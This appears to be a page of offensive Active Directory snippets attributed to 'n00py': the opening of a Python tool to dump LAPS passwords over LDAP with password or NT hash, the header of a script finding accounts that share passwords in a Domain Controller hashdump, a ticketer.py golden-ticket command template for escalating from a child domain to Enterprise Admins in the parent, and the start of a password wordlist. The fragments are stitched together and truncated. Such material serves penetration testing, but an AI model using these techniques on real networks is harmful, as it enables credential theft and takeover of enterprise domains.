n00py

#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse

parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
parser.add_argument('-u','--username',  help='username for LDAP', required=True)
parser.add_argument('-p','--password',  help='password for LDAP (or LM:NT hash)',required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False)
parser.add_argument('-d','--domain', help='Domain', required=True)
parser.add_argument('-t', '--target', help="Target Domain", required=False)

n00py

#!/usr/bin/env python3

#Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
#Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH:::
# ./check_hashes.py <hash_dump>

import argparse
import re

parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords")

n00py

Golden Tickets to hop domains:

Requirements:
Get krbtgt hash from child domain (secretsdump)
Get SID of domain and SID of Enterprise admins group in parent domain (ldapdomaindump/bloodhound)

ticketer.py -nthash
[KRBTGT NT HASH FOR CHILD.PARENT.LOCAL] -domain-sid [SID FOR CHILD.PARENT.LOCAL]
-domain CHILD.PARENT.LOCAL -extra-sid [SID OF ENTERPRISE ADMINS IN PARENT.LOCAL]
[USERNAME IN CHILD.PARENT.LOCAL]

n00py

0
00
0-0
000
0000
00000
000000
000005
00001